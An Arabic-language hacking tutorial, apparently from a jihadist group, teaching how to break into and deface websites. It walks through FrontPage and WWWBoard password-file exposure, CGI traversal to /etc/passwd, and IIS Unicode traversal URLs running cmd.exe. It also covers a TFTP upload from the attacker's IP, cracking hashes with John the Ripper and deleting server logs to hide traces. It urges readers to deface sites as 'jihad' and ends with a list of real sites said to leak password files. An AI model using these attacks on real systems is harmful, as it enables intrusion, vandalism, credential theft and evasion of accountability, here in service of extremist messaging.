وقد يتسائل البعض ما الذي يظهر أو على أي شكل يظهر !؟

الحل بسيط ، وهذا الأمر لو قمت بكتابته في نافذة الدوس ستظهر لك الملفات Dir وطريقة ظهور الملفات في المتصفح تقريباً بنفس طريقة الدوس ، والله أعلم .

ب) شرح الثغرات واستغلالها :

1) شرح ثغرة "الفرونج بيج" وكيفية استغلالها:

ثغرة "الفرونج بيج" هي ثغرة منتشرة جداً بين المواقع وتأتي عادة بهذا الشكل

**www.\*\*\*.com/\_vti\_pvt**

وهذا يعني أن الثغرة هي **\_vti\_pvt** ومن خلال هذه الثغرة تظهر لك ملفات الموقع "الفرونج بيج" أو المشرف .

**ملاحظة مهمة :** تنفيذ الثغرة وتوجد على المواقع التي صممت بالـ "فرونت بيج" ولا تصلح لغيرها لتتعرف - حينها - كون الموقع مصمم بالـ "فرونت بيج" من موقع

<http://www.netcraft.net>

تدخل الموقع وترى أمامك مستطيل ، أدخل الموقع الذي تريد تجميع معلومات حوله ، ويهمننا ملف واحد منه فقط وغيره غالبا لا نستفيد منه شيئا ، وهو :

service.pwd

نفتحه بالمفكرة ونرى "الباسوورد" ، المشفرة ، وتكون بهذا الشكل :

-FrontPage-

Ekendall: bYld1Sr73NLKo

Louisa: 5zm94d7cdDFiQ

هنا نرى أن الموقع عليه مشرفين Ekendall و Louisa نفك التشفير بواسطة برنامج "جون ذا ريبير" بالطبع ، وبعد فك التشفير نذهب للـ "فرونت بيج" File ==>> Open web ، وتضع عنوان الموقع فتظهر لك الصفحة الرئيسية فغير التي تريدها وبعدها Save or publish .

ثم يطلب منك كلمة السرّ والاسم ، والأمر سهل إن شاء الله تضع الاسم وكلمة السر وتضع Sign .

وهذا موقع للتطبيق بعون الله سبحانه :

[http://www.heyerlist.org/garderober/\\_vti\\_pvt](http://www.heyerlist.org/garderober/_vti_pvt)

( 2 ) شرح ثغرة الـ WWWBoard :

هي أسهل ثغرة بالإضافة إلى "الفرونت بيج" ، لنفترض أن الموقع المراد اختراقه هو <http://www.boardprep.net/> ( هذا بالطبع مثال فقط والموقع لا توجد فيه الثغرة ).

فلننصف إليه [wwwboard/passwd.txt](http://wwwboard/passwd.txt)

ليصبح العنوان :

<http://www.boardprep.net/wwwboard/passwd.txt>

تفتح العنوان سوف تجد

Ckhouse: aexMVWnDOyrdE كلمة المرور: إسم المستخدم

أي إن اسم المستخدم ckhouse

وكلمة المرور هي aexMVWnDOyrdE

قم بفك تشفيره ب"جون ذا ريدر" ، الآن عندك اسم المستخدم وكلمة المرور  
فما الحل ؟ وما العمل لتغيير الصفحة الرئيسية !؟

نذهب للأف تي بي ونكتب [ftp.domen.com](http://ftp.domen.com) .

ملاحظة إستبدل [domen.com](http://domen.com) باسم الموقع المطلوب الذي عندك  
"باسوورده" وضع "اليوزر نيم" و"الباسورد" وادخل على الموقع وأنشئ  
صفحة بإسم [index.html](http://index.html) وارفعها للموقع .  
لتحميل الأف تي بي :

<http://members.home.nl/patrick.pagina/temp/Ws-ftp32.zip>

3 ( شرح ثغرة سي جي آي CGI bugs وكيفية استغلالها :

وبعضها يمكن استخدامها مباشرة من المتصفح مثل "اليوني كود" ، وبعض  
ثغرات "السي جي آي" ولكن بعض أو أكثر ثغرات المتصفح يتم التأكد فقط  
من وجودها من خلال المتصفح .

الثغرات التي يمكن استغلالها من المتصفح مباشرة مثل :

/cgi-bin/passwd.txt

إذا كان الموقع هو

www.somesite.com

فتكتب الثغرة هكذا في المتصفح

www.somesite.com/cgi-bin/passwd.txt

هذه الثغرة تعرض لك أسماء المستخدمين وكلمات المرور للمستخدمين للموقع مثل المدير وكل من يسمح له بدخول قاعدة بيانات الموقع .

طبعاً لا تحاول تجربة هذه الثغرة الآن ! .. إلا إذا كنت تريد اختراق موقع في "زيمبابوي" نسيه أصحابه من 10 سنين ! ، حتى هذه الثغرة يمكن ألا تصلح معهم لأنها صارت معروفة .

وبخصوص استغلال العيب في ملفات Cgi & Perl للوصول إلى  
. etc/passwd

سنأخذ الثغرات من نوع **Show Files** ، وعند وجود هذا الملف **/cgi-bin/apexec.pl?** و"الباسوورد" علينا استغلال هذه الثغرة للوصول إلى :

```
http://www.target.com/cgi-
bin/apexe...te=../../../../
../../../../etc/resolv.conf%00.html&passurl=/c
ategory/
```

مع إمكانية تغيير **path** بالملف المراد ، هذا من جهة "البيزل" ونفس الكلام ينطبق على "السي جي آي" **/cgi-bin/hsx.cgi?** عند وجود هذا الملف في **/cgi-bin/** .

حاول تطبيق الثغرة التالية :

```
http://www.Target.com/cgi-
bin/hsx.c.../etc/passwd%00
```

الطريقة المثلى للبحث عن هذه الملفات إما بالاختراق العشوائي أو عن طريق استخدام برنامج "سكان" للبحث عن ثغرات في الموقع ، ضع هذه الملفات ضمن لائحة الثغرات مثل **/cgi-bin/hsx.cgi** وعند وجوده يتم تطبيق ثغرتة بعون الله .

4 ( شرح ثغرة "آي آي أس" IIS وكيفية استغلالها :

IIS = Internet Information Service ونستخدم ثغراته

المعروفة باليوني كودز Unicode's وهي كثيرة جداً مثل:

http://www.xxxx.com/scripts/..&Aacu...d.exe?  
:c+dir+c

http://www.xxxx.com/scripts/..&Agra...d.exe?  
:c+dir+c

http://www.xxxx.com/scripts/..&Agra...d.exe?  
:c+dir+c

http://www.xxxx.com/scripts/..&Agra...d.exe?  
:c+dir+c

http://www.xxxx.com/scripts/..&Aacu...d.exe?  
:c+dir+c

http://www.xxxx.com/scripts/..&Aacu...d.exe?  
:c+dir+c

http://www.xxxx.com/scripts/..&Aacu.../cmd.e  
xe?/c+dir +c:

```
/msadc/..%25%35%63../..%25%35%63../..%
25%35%63../winnt/system32/cmd.exe?/c+dir
+c:
```

```
/MSADC/..%255c..%255c..%255c..%255cwin
nt/system32/cmd.exe?/c+dir+c:
```

طريقه استغلال ثغرات "آي آي أس" بأكثر من طريقة :

يتم تطبيق هذه الثغرات مباشرة من المتصفح مستغلين ملف الـ `cmd.exe` لتنفيذ أوامرنا !

مثال للثغرة وتطبيق الأوامر :

```
http://www.xxxx.com/_vti_bin
/..%c0%af../..%c0%af../winnt/system32/cmd.
exe?/c+dir+c:
```

أمر إنشاء دليل جديد

```
http://www.xxxx.com/_vti_bin
/..%c0%af../..%c0%af../winnt/system32/cmd.
exe?/c+md+cJ
```

أمر إلغاء دليل

[http://www.xxxx.com/\\_vti\\_bin/..\%c0%af..\%c0%af../winnt/system32/cmd.exe?/c+rd+cJ](http://www.xxxx.com/_vti_bin/..\%c0%af..\%c0%af../winnt/system32/cmd.exe?/c+rd+cJ)

الأمر المستخدم للنسخ

[http://www.xxxx.com/\\_vti\\_bin/..\%c0%af..\%c0%af../winnt/system32/cmd.exe?/c+copy+c:winntsystem32cmd.exe+c:inetpubscriptsDJ.exe](http://www.xxxx.com/_vti_bin/..\%c0%af..\%c0%af../winnt/system32/cmd.exe?/c+copy+c:winntsystem32cmd.exe+c:inetpubscriptsDJ.exe)

الأمر المستخدم للحذف

[http://www.xxxx.com/\\_vti\\_bin/..\%c0%af..\%c0%af../winnt/system32/cmd.exe?/c+md+c:inetpubwwwrootindex.asp](http://www.xxxx.com/_vti_bin/..\%c0%af..\%c0%af../winnt/system32/cmd.exe?/c+md+c:inetpubwwwrootindex.asp)

الأمر المستخدم لتغيير مسمى الملف

[http://www.xxxx.com/\\_vti\\_bin/..\%c0%af..\%c0%af../winnt/system32/cmd.exe?/c+ren+cJ.htm+DJKING.htm](http://www.xxxx.com/_vti_bin/..\%c0%af..\%c0%af../winnt/system32/cmd.exe?/c+ren+cJ.htm+DJKING.htm)

الأمر المستخدم لرؤية محتويات الملف

http://www.xxxx.com/\_vti\_bin  
/..%c0%af../..%c0%af../winnt/system32/cmd.  
exe?/c+type+c:index.htm

الأمر المستخدم للكتابة داخل أي ملف

http://www.xxxx.com/\_vti\_bin  
/..%c0%af../..%c0%af../winnt/system32/cmd.  
exe?/c+echo+HACKED+BY+DJ+KING+>+cJ.  
txt

ملاحظة : قد نحتاج إلى تغيير مسمى الدليل بحيث يكون ، msadc ،  
\_vti\_bin ، iisadmpwd ، \_vit\_admin ، scripts ،  
. samples ، cgi-bin

والآن لتغيير الصفحة الأولى لموقع ما لا بدّ من :

- \* الكتابة على الصفحة الرئيسيّة مستخدمين الأمر echo .
- \* برفع صفحتك الشخصيّه بواسطة برنامج ال TFTP .
- \* طريقة الكتابة على الملفّ الرئيسيّ للموقع index.htm باستخدام الأمر  
. echo

مبدئيًا لا بدّ من نسخ ملف `cmd.exe` إلى مجلّد `scripts` بهذا الشكل على سبيل المثال:

```
http://www.xxxx.com/_vti_bin
/..%c0%af../..%c0%af../winnt/system32/cmd.e
xe?/c+copy+c:winntsystem32cmd.exe+c:inetp
ubscriptsDJ.exe
```

وبعد أن تمّ نسخ الملفّ يمكن تصفح الموقع بالثغرة الجديدة

```
:http://www.xxx.com/scripts/DJ.exe/c+dir+c
```

وبعدها يمكن تنفيذ الأمر `echo` بالشكل التالي :

```
http://www.xxx.com/scripts/DJ.exe?/...hacker
mail.com+>+c:inetpubwwwrootindex.htm
```

ملاحظات مهمة :

ليس بالضرورة أن يكون "الإنديكس" الرئيسيّة للموقع اسمها `index.htm` فمن الممكن أن تكون : `index.html` , `default.html` , `default.htm` , `default.asp` فعليك التأكد أولاً من اسم الملفّ

ولكن `index.htm` هو الافتراضي بأن يكون الرئيسيّ وممكن أن يكون الملف الرئيسيّ في مجلد غير الـ `wwwroot` لذا فلا بدّ من البحث ! .

### طريقة استخدام رفع الصفحة بواسطة برنامج TFTP :

ملاحظة : البرنامج موجود في المرفقات المضغوطة بفضل الله

سيتم تطبيقها أيضا في الثغرة التي تم افتراضها أعلاه ، حمّل برنامج الـ FTP فهو صغير وبجانيّ وضعه في الـ `C:` ، ضع "الإنديكس" أو صفحتك المراد رفعها في الـ `C:` أيضا ، شغل البرنامج و اجعله جاهزا ثم نفذ الأمر التالي :

```
http://www.xxxx.com/_vti_bin
/..%c0%af../..%c0%af../winnt/system32/cmd.
exe?/c+tftp.exe+"-
i"+y.y.y.y+GET+index.htm+C:inetpubwwwroo
tindex.htm
```

بحيث `tftp.exe` هو البرنامج المستخدم للرفع

"i-" براميتر

y.y.y.y رقم "الآي بي" الخاص بك

والباقي على ما أظنّ لا يحتاج توضيح .

C: inetpubwwwrootindex.htm هو الوضع الافتراضي كما

ذكرت ، لكن من الممكن أن يختلف من موقع لآخر فلا بدّ من التأكد أولا .

وأخيراً لمسح "اللوغ"

```
http://www.xxxx.com/_vti_bin
/..%c0%af../..%c0%af../winnt/system32/cmd.
exe?/c+del+c:/winnt/system32/logfiles/*.log
```

هذا تقريباً كلّ ما يخصّ "سيرفرات" الويندوز و الـ IIS ، أما بالنسبة للمواقع التي سيرفرتها على سبيل المثال Apache on Linux : فطريقة التفكير ستتغيّر كلياً ما خلا الاختراق عن طريق الـ ftp server ، فمعظم نسخ الـ ftp لها ثغرات يمكن استغلالها.

5 ( شرح ثغرة "اليوني كود" وكيفية استغلالها :

أولاً : ثغرات "اليوني كود" :

## UNICODE - Internet Information Service IIS4 - IIS5

"اليوني كود" : نظام خدمة المعلومات للإنترنت ، الإصدار الرابع - أو الخامس .

تعريف بالـ "يوني كود" : اليونيكود عبارة عن مجموعة من الثغرات في مجموعة خدمة المعلومات التي ركبت مع IIS4.0/IIS5.0 والذي يأتي عادة مع NT4/Win2k .

كيفية إيجاد هذه الثغرات :

يتم إيجاد هذه الثغرات بطريقتين :

الأولى : بواسطة البرامج اللازمة والمخصصة لكشف هذه الثغرات ، سواء بالبرامج التي تعمل على نظام "ويندوز" أو بطريقة "الشيل" والتي تعمل على نظام لينوكس .

الثانية : بواسطة تطبيق الثغرة على الموقع مباشرة .

كيف يتم استغلال ثغرات "اليوني كود" :

عند تطبيق الثغرة على نظام الـ IIS4/IIS5 يبدأ ملف CMD بفك شفرة "اليوني كود" في المثال الخطأ ومن هنا يتم استغلالها .

الأوامر المستخدمة بواسطة ملف CMD :

وهي أمر لإنشاء دليل جديد وأمر لإلغاء دليل وأمر النسخ وأمر النقل وأمر الحذف وأمر تغيير أسماء الملفات وأمر لرؤية محتويات الملف وأمر الكتابة داخل أي ملف وأمر لسحب أي ملف ، وهي حسب الأمثلة التالية :

الطريقة الأولى بالتعامل مع الملف `ssinc.dll` والطريقة كما يلي :

أولاً إنشاء صفحة باسم `test.shtml` تكون هذه الصفحة داخل مجلد `wwwroot/hEx/test.shtml` ، كتابة هذا "الكود" داخل الصفحة بحيث أن حرف **A** يتم كتابته حتى يتعدى **2049** حرف ، الآن يتم طلب الصفحة من خلال المتصفح `http://www.xxxx.com/test.shtml` ، الآن سوف تظهر لك الصفحة ، والآن تستطيع الكتابه وتم تخطي مشكلة الـ **Access Denied** ، إذا ظهرت لك صفحة الخطأ رقم **500** فمعنى ذلك أنك لم تقم بتطبيق الطريقة بالشكل الصحيح وعليك إعادة المحاولة .

الطريقة الثانية باستخدام برنامج **NC.exe** بحيث يتم عمل "أب لوود" لهذا الملف داخل مجلد الـ **Temp** في دليل "الويندوز" ، ومنه يتم تنفيذ الأوامر من خلال موجه "الدوس" وللعلم فإن مجلد الـ **Temp** مفتوح لعمليات "الأب لوود" .

الطريقة الثالثة وهي من خلال عمل "كراش" للسيرفر باستخدام البرامج اللازمة لهذا الغرض وهذه الطريقة غير مجدية في كثير من الاحيان .

الطريقة الرابعة البحث عن ملفات `root.exe` ، `sensepost.exe` ، `shell.exe` ، `w3svc.exe` ونسـخها إلى مجلد `c:\inetpub\scripts` وتطبيق الثغرة من خلالها .

حتى هنا نكون قد شرحنا وبالأمثلة كيفية اختراق المواقع عن طريق استغلال الثغرات التي بها .

ولكن هناك ثغرات في الأنظمة قد تؤدي بنا إلى الحصول على ملف "الباسورد" للنظام ، وإذا استطعنا الحصول عليه وفك تشفيره عندها يصبح النظام بالكامل خاضع لنا وكل المواقع التي على السيرفر بإمكاننا التحكم فيها كيفما نشاء وهو ما سيتم شرحه في هذا القسم التالي بعون الله .

### ملفات "الباسورد" وكيفية التعامل معها

قبل البدء بهذا القسم عليك - غير مأمور - مراجعة شرح ملف "الباسورد" من القسم الأول الذي هو أساسيات وتعريف .

إذا كان ملف password مظلل ماذا تفعل ؟ الآن جميع ملفات password تكون مظللة ولكن توجد طريقة لفكها !

إذا وجدت الملف مظلل يجب عليك البحث عن ملف "الشادوو" shadow .

ما هي أماكن تواجد ملف shadow في الأنظمة ؟ وهذا الملف يوجد في أمكنة معينة وكل نظام تشغيل له مكان يوضع به هذا الملف ، إليك الجدول التالي :

Linux: /etc/shadow token = \*

SunOS: /etc/shadow token =

هو \*

FreeBSD: /etc/master. Passwd or /etc/shadow  
token = \*

والجديد هو X

IRIX: /etc/shadow token = x

AIX: /etc/security/passwd token = !

ConvexOS : /etc/shadow or /etc/shadpw token  
= \*

**Token** تعني الرمز الذي يوجد في الملف **passwd** وهذا يفيد في تسهيل المهمة ، يعني لو مثلا لقيت علامة! بدل كلمة المرور فهذا يعني أن كلمة المرور مسجلة في **/etc/security/passwd** ، لقد استعنت بالجدول السابق ذكره ، مثال على ملف "شادوو" ( ملف "شادوو" هو الملف الذي تخزن فيه كلمة المرور الصحيحة ).

ملف "الشادوو" تكون الكلام الذي فيه مشفر الخطوة الأخيرة وهي دمج ملف **shadow & password** ، أنصحك في دمج ملف "الشادوو" مع ملف "الباسوورد" بكتابة هذا الأمر في برنامج "جون ذا ريبير" وهذه وصلة البرنامج وتجده أيضا في المرفقات المضغوطة بفضل الله .

<http://www.openwall.com/john>

أنبه أولاً من أن البرنامج مخصص لفك تشفير الملفات المشفرة ولكن يوجد في أمر لدمج ملف "الشادوو" مع ملف "الباسوورد" ، وذلك لضمان عدم وقوع أخطاء عند الدمج ، الأمر هو

unshadow passwd.txt shadow.txt

إذا لم تنجح العملية وتريد تطبيقها يدويا فهي سهلة ولكن لضمان عدم وقوع أخطاء عند الدمج فقط قم بتبديل علامة X التي تكون في ملف "الباسوورد" بـ اللام الموجود بدلا عنها في ملف "الشادوو" تطبق العملية في كل علامة X تكون في ملف "الباسوورد" .

بعد دمج الملفين تصبح الأمور جاهزة لتشغيل برنامج John the ripper والذي سيقوم بتخمين "الباسوورد" بسرعة عالية جداً ولكن عليك الصبر فهذه العملية قد تأخذ أيام ! في بعض الأحيان ( انتظر الشرح في آخر المقالة ) .

حسنا لو افترضنا أننا استطعنا الحصول على "الباسوورد" الحقيقي ما هي الخطوة القادمة ؟!

كيفية استغلال "الباسوورد" : يمكنك استغلال "باسوورد" الموقع في "التييل-نت" ، تدخل من "التييل - نت" وتعمل ما تريد أو أنك تدخل من "الأف تي بي" وهو الأسهل والمنتشر .

كيفية الدخول بالـ ftp ؟ ، يمكنك استخدام أحد برامج الـ ftp منها :

## CuteFTP 4.2.5 Build 10.4.1 أو Ws\_ftp

الآن نحن بحول الله اخترقنا موقع ونريد تغيير صفحة البداية ونكتب مثلاً " تمّ اختراق هذا الموقع ! " كيف يتم ذلك ؟

تستطيع تغيير الصفحة الرئيسية عندما يكون "الباسورد" التابع للموقع موجود عندك ، وبعدها تدخل عليه ، ثم تذهب لملف **index** افتحه أو قم بإلغائه وضع ملف بنفس الاسم بالأمر التي نريدها بواسطة برنامج يسمى **Cute FTP** و**WS\_FTP PRO** والبرنامج سهل إن شاء الله .

وبإمكانك أيضاً أن تحاول الدخول للوحة التحكم ، معظم المواقع تكون لوحة تحكمها على الشكل **www.sitename.com:2082** أو **www.sitename.com/cpanel** ، هذا في حال كون الموقع يستخدم الـ **CPanel** وهو البرنامج الأكثر شيوعاً ، ومن ثم تظهر لك نافذة اكتب فيها اسم المستخدم وكلمة السر ، وتصبح في الداخل بإذن الله .

و هنا شرح للعملية كمثال عبر برنامج **TFTP** ؛

تغيير الصفحة الرئيسية للموقع وعملية "الأب لوود" بواسطة برنامج

**TFTP** :

قم بإنشاء صفحة وضع شعارك عليها واحفظها باسم index.htm على الـ  
c:\ ، قم بتشغيل برنامج TFTP ونفذ الأمر في الفقرة التالية :

```
c:\tftp.exe "-i" 1.1.1.1 GET index.htm  
C:\inetpub\wwwroot\index.htm
```

والتفصيل هنا كالتالي :

TFTP وهو البرنامج اللازم لعمل "الأب لوود" ، ويجب أن يكون شغال في  
حالة تنفيذ الأمر.

"-i" وهو بمثابة "باراميترز" من أجل قراءة البيانات في مكتبة الملفات.

1.1.1.1 رقم "الآي بي" الخاص بك .

GET وهو الأمر اللازم لطلب الملفات ما بين الإرسال والاستقبال.

Index.htm اسم الملف في جهازك.

\inetpub\wwwroot\ اسم الدليل في "السيرفر".

Index.htm اسم الملف على "السيرفر".

بقيت هناك خطوة مهمة عند اختراق أي موقع ألا وهي إخفاء آثارك بعد الاختراق ، حتى لا يعرفنا صاحب الموقع فيؤذينا أو يبلغ عنا ، فكيف ذلك ؟

نكتب هذا الأمر في "الدوس"

```
c:\ del c:/winnt/system32/logfiles/*.log
```

أو نذهب إلى الـ **c:** وبعدها إلى ملف **windows** ومن ثم ملف **System32** ، وبعدها نقوم بمحي ومسح أي ملف ينتهي بـ **.log** .

بقي علينا الآن أن نضيف نقطة قد تنفع بعض الإخوة في التدرب على "اليونكس" و الاختراق ألا وهي كيفية الحصول على "شيل أكاونت" مجاني وهي تتم عبر الآتي :

وتنقسم "الشيل أكاوننتس" إلى نوعين :

1) restricted

2) non-restricted

والفرق بينهما أن **restricted** مدفوع القيمة ويمكنك من تنفيذ أي **command** أما الـ **non-restricted** فهو مجاني لكن مشكلته أنه لا يمكنك من تنفيذ كل الأوامر !

لكي تحصل على "شيل أكاونت" مجاناً يمكنك الحصول عليه من أي مزود "شيل أكاونتس" على الشبكة مثل : [www.cyberarmy.net](http://www.cyberarmy.net)

أو اتصل بمزود الخدمة واطلب منه "شيل أكاونت" ، طبعاً سيسألك لماذا تريد "الشيل أكاونت" فتجيبه بأنك تريد استخدامه للتدرب على نظام "اللينوكس واليونكس" فيما بعد ! ، وهذه الإجابة كافية لكي يعطيك "شيل أكاونت" ، و"الشيل أكاونتس" مختلفة وتميز فيما بينها بالتالي :

- 1) telnet .
- 2) nslookup والذي يعطيك معلومات عن المضيف .
- 3) ftp .
- 4) finger .
- 5) trace route .
- 6) dig وهذا الأمر غير متاح - غالباً - في معظم "الشيلز" المجانية .
- 7) netstat .
- 8) gcc وهذا "كومبايلير" للغة البرمجة C .
- 9) gzip لفك ضغط الملفات .
- 10) lynx متصفح للإنترنت .

مختصر شرح البرامج المستخدمة :

شرح برنامج "جون ذا ريبير" : ضع البرنامج في السي ، وملاحظة : احفظ  
الباسورد في نفس ملف البرنامج في ملف txt وتسميه password ،  
لأجل التماشي مع الشرح .

أما عن كيفية شغل البرنامج ؟ فالبرنامج يعمل على "الدوس" ، فادخل على  
"الدوس" واكتب cd.. حتى يصبح شكله هكذا c:> ثم  
اكتب john ، والآن تنقصك أوامر البرنامج فما هي ؟

1 ( أمر يبحث لك عن الكلمات المحتملة من خلال قوائم بكلمات السر  
وصيغته كالتالي : john -w:wordlist.txt password.txt

ملف wordlist هي كلمات السر المحتملة و  
password كلمة السر المشفرة رغم أنني لا أنصح بهذا الاختيار والله أعلم .

2 ( أمر يبحث لك عن كلمات السر التي تكون مطابقة لاسم المستخدم وصيغته  
john -single passwd.txt .

3 ( أمر يبحث لك عن الأرقام فقط وصيغته : john -iD:igits  
passwd.txt .

4 ( أمر يبحث عن الحروف الصغيرة : john -i:Alpha passwd.txt

5) أمر يبحث لك عن جميع الاحتمالات الممكنة وصيغته : john -i:all  
passwd.txt ، هذا الخيار فيما إذا فشلت فيها كلها ، لأنه طويل ولكنه  
أفضل اختيار والله أعلم .

حسنا قمت أنا واخترت آخر خيار وبدأ البرنامج يعمل لمدة ساعة مثلا ، ولم  
يحدث أي شيء ! ، ولست متفرغا لأترك الجهاز يعمل لوحده فما العمل ؟ !  
عندي الحل : اضغط على "كونترول" + "شيفت" + "سي" أو "كونترول" +  
"س" ctrl+shift+c .  
ctrl+c .

فكيف أكمل ؟! ، اكتب john-restore وهو يكمل .

الآن كمثال فلنحاول - مستعنين بالله - اختراق موقع ما ! ، أول ما يجب علينا  
البدء به هو المواقع العادية وليس مواقع وواجهات للاستخبارات الصليبية كالياهو  
مثلا ! ، لأن اختراق المواقع العادية سهل جدا بعون الله ، فلا تتقاعس أخي عن  
الجهاد الذي قد ساقه الله لك ودع القول ولنبدأ العمل !

البرامج اللازمة : John the ripper و WS\_FTP pro وكلاهما  
موجود في المرفقات المضغوطة بفضل الله سبحانه وحده .

بسم الله نبدأ :

الآن نعطيكم موقع فيه ثغرة ونحاول تنفيذها وهو :

<http://www.dsg-art.com> (هذا الموقع مثال فقط والثغرة على ما يبدو ليست فيه الآن)

هذا الموقع مصاب بثغرة ملف "الباسورد" التي هي :

[wwwboard/passwd.txt](http://wwwboard/passwd.txt)

الآن ننفذ الثغرة

<http://www.dsg-art.com/wwwboard/passwd.txt>

من أجل أن يظهر لنا "اليوزر نيم" و "الباسورد" كالتالي :

[jc:GXQ4cN0fhbptw](http://wwwboard/passwd.txt)

[jc](http://wwwboard/passwd.txt) "اليوزر نيم" ، وما يليه [GXQ4cN0fhbptw](http://wwwboard/passwd.txt) "الباسورد" ؛ هذا "الباسورد" كما هو ظاهر ومعلوم مشفر فكيف يتم فك تشفيره للحصول على "الباسورد" الأصلي؟!

طبعا بيرنامج "جون ذا ريبير" السابق ذكره وشرحه أعلاه .

حسنا الآن قمنا بفك التشفير وصار عندنا "اليوزر نيم" و "الباسوورد" للموقع ، إذن مبارك عليكم - بفضل الله - تمت عملية الاختراق .

الآن نريد كتابة " لا إله إلا الله محمد رسول الله ، تم الاختراق بواسطة كتيبة الجهاد الإعلامي ، ولله العزة ولرسوله وللمؤمنين " مثلا فكيف يتم ذلك؟!

طبعا يتم ذلك ببرنامج "الأف تي بي" WS\_FTP PRO .

حسنا الآن نضع "اليوزر نيم" و "الباسوورد" في البرنامج وندخل على "الريموت" التابع للموقع المراد ؛ وإذا أردت تدمير الموقع تقوم مستعينا بالله بعملية مسح للملفات .

يوجد فيما بين الملفات ملف يسمى [index.html](#) ، هذا كما أسلفنا ملف الصفحة الرئيسية للموقع ، الآن نحن بالطبع قد قمنا بتجهيز الملف المعتمد والذي فيه " لا إله إلا الله محمد رسول الله ، تم الاختراق بواسطة كتيبة الجهاد الإعلامي ، ولله العزة ولرسوله وللمؤمنين " من قبل ، والآن نقوم بمسح ومحى وحذف الملف "إنديكس" التابع للموقع ، ونقوم بإدخال ملفنا المعد سلفا من جهازنا بعد اختيار وتحديد مكانه على الجهاز بعون الله .

الآن أبشر واستبشر وبشّر من خلفك ، تم اختراق الموقع - بعون الله - وترك رسالة لصاحبه " تم اختراق الموقع ! " .

وكما أسلفنا من أجل عدم معرفة صاحب الموقع هوية صاحب الاختراق نذهب ونمسح ملفات "اللوغ" التي تم شرحها أعلاه بحمد الله ، والآن بإمكان أيّا كان قرأ ما جاء أعلاه اختراق المواقع العادية والمواقع ضعيفة التحصين بحول الله وقته .

وفي النهاية هذا جدول لمواقع قابلة للاختراق مع أنواع الثغرات المختلفة مع التأكيد على أنه ليس بالضرورة أن تكون جميع الثغرات موجودة وتعمل الآن في المواقع عند قراءتكم للموضوع دام فضلكم .

## مواقع فيها ثغرات

<http://www.efn.org/~dalep/wwwboard/passwd.txt>

<http://www.lionnet.org.tr/118u/wwwboard/passwd.txt>

<http://members.mint.net/raske/wwwboard/passwd.txt>

<http://www.avatar-moving.com/kb/wwwboard/passwd.txt>

<http://espa.virtualave.net/wwwboard/passwd.txt>

<http://mulerider.saumag.edu/wwwboard-passwd.txt>

<http://www.kcftoa.org/hazmat/wwwboard-passwd.txt>

<http://www.go-steeltown.com/classif...oard/passwd.txt>

<http://www.creative-design.de/kmt/wwwboard/passwd.txt>

<http://www.kaapeli.fi/~hekata/wwwboard-passwd.txt>

<http://www.go-steeltown.com/invitat...oard/passwd.txt>

<http://www.ica1.uni-stuttgart.de/~k...oard/passwd.txt>

<http://sitemanager.hypermart.net/wwwboard-passwd.txt>

<http://cgi.snafu.de/utimper/user-cg...oard/passwd.txt>

<http://www.foxsden.org/psf/FFE/wwwboard/passwd.txt>

<http://expert.cc.purdue.edu/~pumsan/wwwboard/passwd.txt>

<http://www.cabinessence.com/brian/s...oard/passwd.txt>

<http://wrm.hre.ntou.edu.tw/wrm/wwwboard/passwd.txt>

<http://www.radiocollege.org/rc/wwwboard/passwd.txt>

<http://www.student.utwente.nl/~here...oard/passwd.txt>

<http://www.as.ua.edu/arcca/wwwboard/passwd.txt>

<http://students.cs.byu.edu/~quixote/wwwboard/passwd.txt>

<http://lrf1.unizar.es/~martin/panze...oard/passwd.txt>

<http://www.netset.com/~jdennis/wwwboard/passwd.txt>

<http://www.rit.edu/~jrd4663/cgi-bin/wwwboard/passwd.txt>

<http://www.i-55.com/andersoninc/wwwboard/passwd.txt>

<http://www.volker.de/deutsch/kontak...oard/passwd.txt>

<http://www.ug.cs.sunysb.edu/~boehme...oard/passwd.txt>

<http://www.cjns.com/cyb/cyberair/wwwboard/passwd.txt>

<http://www.cabling-design.com/inter...oard/passwd.txt>

<http://www.educanet.net/privado/con...oard/passwd.txt>

[http://www.zetor.org/scifi/public\\_h...oard/passwd.txt](http://www.zetor.org/scifi/public_h...oard/passwd.txt)

<http://www.nwlink.com/~nickguy/wwwboard/passwd.txt>

<http://www.dj-pool.de/PoolDeutsch/p...oard/passwd.txt>

<http://gladstone.uoregon.edu/~solsh...oard/passwd.txt>

<http://ftp.duth.gr/pub/netlib/utk/wwwboard/passwd.txt>

<http://www.freelance-street.co.uk/wwwboard/passwd.txt>

<http://gaia.ecs.csus.edu/~brookd/wwwboard/passwd.txt>

<http://gaia.ecs.csus.edu/~brookd/wwwboard/passwd.txt>

<http://www.arts.cuhk.edu.hk/~cmc/in...oard/passwd.txt>

<http://www.clearlight.com/~brawicz/wwwboard/passwd.txt>

<http://www.yellowstone-natl-park.co...oard/passwd.txt>

<http://www.mtsu.edu/~ccurry/sets/ex...oard/passwd.txt>

<http://www.kaibutsu-thx.com/cx/htm/wwwboard/passwd.txt>

<http://www.kidlink.org/KIDPROJ/Brid...oard/passwd.txt>

<http://www.markoschulz.de/scripte/f...oard/passwd.txt>

<http://crux.baker.edu/myeake01/wwwboard/passwd.txt>

<http://207.65.96.29/users/akira/wwwboard/passwd.txt>

<http://hkbne.virtualave.net/wwwboard/password.txt>

<http://gybe.com/boggy/swallowtails/wwwboard/passwd.txt>

<http://gazissax.best.vwh.net/alsira...oard/passwd.txt>

<http://www.deltakappagamma.org/Inte...oard/passwd.txt>

<http://pepup.hypermart.net/wwwboard/passwd.txt>

<http://www.utexas.edu/depts/asih/wwwboard/passwd.txt>

<http://hemi.ps.tsoa.nyu.edu/webchat/passwd.txt>

<http://www.stenum.at/euinfo/passwd.txt>

<http://www.mexconnect.com/liveboard/passwd.txt>

<http://www.doc.ic.ac.uk/~ipa98/jondon/passwd.txt>

<http://www.pnpi.spb.ru/nrd/ucn/cgi-...dmin/passwd.txt>

<http://gazissax.best.vwh.net/alsira...oard/passwd.txt>

<http://www.public.iastate.edu/~benco/oclub/passwd.txt>

<http://students.washington.edu/msa/waami/passwd.txt>

<http://member.mfea.com/Members/bbs/admin/passwd.txt>

<http://ais.gmd.de/~sylla/Archive/passwd.txt>

<http://www.lvadb.nl/regionalisering...9874/passwd.txt>

<http://www.jump.net/~alancook/discu...9311/passwd.txt>

<http://www.notam.com/forum/passwd.txt>

<http://www.sandiego.edu/~deroche/group4p/passwd.txt>

<http://www.sandiego.edu/~deroche/case7/passwd.txt>

<http://www.louisville.com/talk/passwd.txt>

<http://www.swe.org/SWE/Convention/den01/passwd.txt>

<http://www.colorado.edu/geography/g...sion/passwd.txt>

